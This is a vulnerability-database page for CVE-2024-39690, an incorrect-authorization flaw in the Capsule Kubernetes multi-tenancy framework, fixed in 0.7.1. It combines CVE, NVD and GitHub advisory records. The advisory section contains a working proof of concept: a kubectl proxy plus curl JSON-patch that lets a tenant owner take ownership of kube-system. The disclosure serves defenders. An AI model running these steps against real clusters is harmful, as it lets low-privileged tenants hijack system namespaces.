CVE-2024-39690 (GCVE-0-2024-39690)
Vulnerability from cvelistv5 – Published: 2024-08-20 14:33 – Updated: 2025-08-14 13:32
VLAI?
Summary
Capsule is a multi-tenancy and policy-based framework for Kubernetes. In Capsule v0.7.0 and earlier, the tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace. Version 0.7.1 contains a patch.
Severity ?
8.5 (High)
CWE
- CWE-863 - Incorrect Authorization
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| projectcapsule | capsule |
Affected:
<= 0.7.0
|
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:clastix:capsule:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "capsule",
"vendor": "clastix",
"versions": [
{
"lessThanOrEqual": "0.7.0",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-39690",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-20T15:05:29.719635Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-20T15:08:08.489Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "capsule",
"vendor": "projectcapsule",
"versions": [
{
"status": "affected",
"version": "\u003c= 0.7.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Capsule is a multi-tenancy and policy-based framework for Kubernetes. In Capsule v0.7.0 and earlier, the tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace. Version 0.7.1 contains a patch."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-863",
"description": "CWE-863: Incorrect Authorization",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-14T13:32:03.818Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/projectcapsule/capsule/security/advisories/GHSA-mq69-4j5w-3qwp",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/projectcapsule/capsule/security/advisories/GHSA-mq69-4j5w-3qwp"
},
{
"name": "https://github.com/projectcapsule/capsule/commit/d620b0457ddec01616b8eab8512a10611611f584",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/projectcapsule/capsule/commit/d620b0457ddec01616b8eab8512a10611611f584"
}
],
"source": {
"advisory": "GHSA-mq69-4j5w-3qwp",
"discovery": "UNKNOWN"
},
"title": "Capsule tenant owner with \"patch namespace\" permission can hijack system namespaces"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-39690",
"datePublished": "2024-08-20T14:33:24.518Z",
"dateReserved": "2024-06-27T18:44:13.035Z",
"dateUpdated": "2025-08-14T13:32:03.818Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"fkie_nvd": {
"configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:projectcapsule:capsule:*:*:*:*:*:*:*:*\", \"versionEndIncluding\": \"0.7.0\", \"matchCriteriaId\": \"A192D305-E13C-436F-8AF2-0D3DC4CD03C1\"}]}]}]",
"descriptions": "[{\"lang\": \"en\", \"value\": \"Capsule is a multi-tenancy and policy-based framework for Kubernetes. In Capsule v0.7.0 and earlier, the tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace.\"}, {\"lang\": \"es\", \"value\": \"Capsule es un framework multiinquilino y basado en pol\\u00edticas para Kubernetes. En Capsule v0.7.0 y versiones anteriores, el inquilino-propietario puede parchear cualquier espacio de nombres arbitrario que no haya sido asumido por un inquilino (es decir, espacios de nombres sin el campo propietarioReferencia), obteniendo as\\u00ed el control de ese espacio de nombres.\"}]",
"id": "CVE-2024-39690",
"lastModified": "2024-08-21T16:01:47.157",
"metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\", \"baseScore\": 8.4, \"baseSeverity\": \"HIGH\", \"attackVector\": \"ADJACENT_NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 1.7, \"impactScore\": 6.0}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 8.8, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 5.9}]}",
"published": "2024-08-20T15:15:21.340",
"references": "[{\"url\": \"https://github.com/projectcapsule/capsule/commit/d620b0457ddec01616b8eab8512a10611611f584\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/projectcapsule/capsule/security/advisories/GHSA-mq69-4j5w-3qwp\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\"]}]",
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-863\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-863\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2024-39690\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-08-20T15:15:21.340\",\"lastModified\":\"2025-08-14T14:15:30.037\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Capsule is a multi-tenancy and policy-based framework for Kubernetes. In Capsule v0.7.0 and earlier, the tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace. Version 0.7.1 contains a patch.\"},{\"lang\":\"es\",\"value\":\"Capsule es un framework multiinquilino y basado en pol\u00edticas para Kubernetes. En Capsule v0.7.0 y versiones anteriores, el inquilino-propietario puede parchear cualquier espacio de nombres arbitrario que no haya sido asumido por un inquilino (es decir, espacios de nombres sin el campo propietarioReferencia), obteniendo as\u00ed el control de ese espacio de nombres.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\",\"baseScore\":8.4,\"baseSeverity\":\"HIGH\",\"attackVector\":\"ADJACENT_NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.7,\"impactScore\":6.0},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-863\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-863\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:projectcapsule:capsule:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"0.7.0\",\"matchCriteriaId\":\"A192D305-E13C-436F-8AF2-0D3DC4CD03C1\"}]}]}],\"references\":[{\"url\":\"https://github.com/projectcapsule/capsule/commit/d620b0457ddec01616b8eab8512a10611611f584\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/projectcapsule/capsule/security/advisories/GHSA-mq69-4j5w-3qwp\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-39690\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-08-20T15:05:29.719635Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:clastix:capsule:*:*:*:*:*:*:*:*\"], \"vendor\": \"clastix\", \"product\": \"capsule\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"0.7.0\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-08-20T15:08:00.655Z\"}}], \"cna\": {\"title\": \"Capsule tenant owner with \\\"patch namespace\\\" permission can hijack system namespaces\", \"source\": {\"advisory\": \"GHSA-mq69-4j5w-3qwp\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 8.5, \"attackVector\": \"ADJACENT_NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"projectcapsule\", \"product\": \"capsule\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 0.7.0\"}]}], \"references\": [{\"url\": \"https://github.com/projectcapsule/capsule/security/advisories/GHSA-mq69-4j5w-3qwp\", \"name\": \"https://github.com/projectcapsule/capsule/security/advisories/GHSA-mq69-4j5w-3qwp\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/projectcapsule/capsule/commit/d620b0457ddec01616b8eab8512a10611611f584\", \"name\": \"https://github.com/projectcapsule/capsule/commit/d620b0457ddec01616b8eab8512a10611611f584\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Capsule is a multi-tenancy and policy-based framework for Kubernetes. In Capsule v0.7.0 and earlier, the tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace. Version 0.7.1 contains a patch.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-863\", \"description\": \"CWE-863: Incorrect Authorization\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-08-14T13:32:03.818Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2024-39690\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-08-14T13:32:03.818Z\", \"dateReserved\": \"2024-06-27T18:44:13.035Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-08-20T14:33:24.518Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
FKIE_CVE-2024-39690
Vulnerability from fkie_nvd - Published: 2024-08-20 15:15 - Updated: 2025-08-14 14:15
Severity ?
8.4 (High) - CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
Capsule is a multi-tenancy and policy-based framework for Kubernetes. In Capsule v0.7.0 and earlier, the tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace. Version 0.7.1 contains a patch.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| projectcapsule | capsule | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:projectcapsule:capsule:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A192D305-E13C-436F-8AF2-0D3DC4CD03C1",
"versionEndIncluding": "0.7.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Capsule is a multi-tenancy and policy-based framework for Kubernetes. In Capsule v0.7.0 and earlier, the tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace. Version 0.7.1 contains a patch."
},
{
"lang": "es",
"value": "Capsule es un framework multiinquilino y basado en pol\u00edticas para Kubernetes. En Capsule v0.7.0 y versiones anteriores, el inquilino-propietario puede parchear cualquier espacio de nombres arbitrario que no haya sido asumido por un inquilino (es decir, espacios de nombres sin el campo propietarioReferencia), obteniendo as\u00ed el control de ese espacio de nombres."
}
],
"id": "CVE-2024-39690",
"lastModified": "2025-08-14T14:15:30.037",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 6.0,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2024-08-20T15:15:21.340",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/projectcapsule/capsule/commit/d620b0457ddec01616b8eab8512a10611611f584"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit"
],
"url": "https://github.com/projectcapsule/capsule/security/advisories/GHSA-mq69-4j5w-3qwp"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-863"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-863"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GHSA-MQ69-4J5W-3QWP
Vulnerability from github – Published: 2024-08-20 18:34 – Updated: 2025-08-14 13:32
VLAI?
Summary
Capsule tenant owner with "patch namespace" permission can hijack system namespaces
Details
Attack Vector
Then, let me briefly explain the reasons for the errors mentioned above: 1. The 'kubectl edit' command was used to patch the namespace, but this operation requires both 'get' and 'patch' permissions, hence the error. One should use methods like 'curl' to directly send a PATCH request; 2. The webhook does not intercept patch operations on 'kube-system' because 'kube-system' does not have an ownerReference.
Below are my detailed reproduction steps
- Create a test cluster
kind create cluster --image=kindest/node:v1.24.15 --name=k8s - Install the capsule
helm install capsule projectcapsule/capsule -n capsule-system --create-namespace - Create a tenant
kubectl create -f - << EOF
apiVersion: capsule.clastix.io/v1beta2
kind: Tenant
metadata:
name: tenant1
spec:
owners:
- name: alice
kind: User
EOF
- Create user alice
./create-user.sh alice tenant1 capsule.clastix.io
export KUBECONFIG=alice-tenant1.kubeconfig
- Patch kube-system (The first command is executed in the current shell, while the 2nd and 3rd commands require a different shell window because the current shell is being used as a proxy.)
kubectl proxy
export DATA='[{"op": "add", "path": "/metadata/ownerReferences", "value":[{"apiVersion": "capsule.clastix.io/v1beta2", "blockOwnerDeletion": true, "controller": true, "kind": "Tenant", "name": "tenant1", "uid": "ce3f2296-4aaa-45b0-a8fe-879d5096f193"}]}]'
curl http://localhost:8001/api/v1/namespaces/kube-system/ -X PATCH -d "$DATA" -H "Content-Type: application/json-patch+json"
- Check the result
The kube-system is patched successfully.
Summary
The tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace.
I would like to express my apologies once again. I have always been sincere in my research and communication, and I did not intend to disturb you on purpose.
Severity ?
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.7.0"
},
"package": {
"ecosystem": "Go",
"name": "github.com/projectcapsule/capsule"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.7.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-39690"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-20T18:34:37Z",
"nvd_published_at": "2024-08-20T15:15:21Z",
"severity": "HIGH"
},
"details": "# Attack Vector\nThen, let me briefly explain the reasons for the errors mentioned above: 1. The \u0027kubectl edit\u0027 command was used to patch the namespace, but this operation requires both \u0027get\u0027 and \u0027patch\u0027 permissions, hence the error. One should use methods like \u0027curl\u0027 to directly send a PATCH request; 2. The webhook does not intercept patch operations on \u0027kube-system\u0027 because \u0027kube-system\u0027 does not have an ownerReference.\n\n# Below are my detailed reproduction steps\n1. Create a test cluster\n`kind create cluster --image=kindest/node:v1.24.15 --name=k8s`\n2. Install the capsule\n`helm install capsule projectcapsule/capsule -n capsule-system --create-namespace`\n3. Create a tenant\n```\nkubectl create -f - \u003c\u003c EOF\napiVersion: capsule.clastix.io/v1beta2\nkind: Tenant\nmetadata:\n name: tenant1\nspec:\n owners:\n - name: alice\n kind: User\nEOF\n```\n4. Create user alice\n```\n./create-user.sh alice tenant1 capsule.clastix.io\nexport KUBECONFIG=alice-tenant1.kubeconfig\n```\n5. Patch kube-system (The first command is executed in the current shell, while the 2nd and 3rd commands require a different shell window because the current shell is being used as a proxy.)\n```\nkubectl proxy\n\nexport DATA=\u0027[{\"op\": \"add\", \"path\": \"/metadata/ownerReferences\", \"value\":[{\"apiVersion\": \"capsule.clastix.io/v1beta2\", \"blockOwnerDeletion\": true, \"controller\": true, \"kind\": \"Tenant\", \"name\": \"tenant1\", \"uid\": \"ce3f2296-4aaa-45b0-a8fe-879d5096f193\"}]}]\u0027\n\ncurl http://localhost:8001/api/v1/namespaces/kube-system/ -X PATCH -d \"$DATA\" -H \"Content-Type: application/json-patch+json\"\n```\n7. Check the result\nThe kube-system is patched successfully.\n\n\n\n# Summary\nThe tenant-owner can patch any arbitrary namespace that has not been taken over by a tenant (i.e., namespaces without the ownerReference field), thereby gaining control of that namespace.\n\nI would like to express my apologies once again. I have always been sincere in my research and communication, and I did not intend to disturb you on purpose.",
"id": "GHSA-mq69-4j5w-3qwp",
"modified": "2025-08-14T13:32:09Z",
"published": "2024-08-20T18:34:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/projectcapsule/capsule/security/advisories/GHSA-mq69-4j5w-3qwp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39690"
},
{
"type": "WEB",
"url": "https://github.com/projectcapsule/capsule/commit/d620b0457ddec01616b8eab8512a10611611f584"
},
{
"type": "PACKAGE",
"url": "https://github.com/projectcapsule/capsule"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "Capsule tenant owner with \"patch namespace\" permission can hijack system namespaces"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…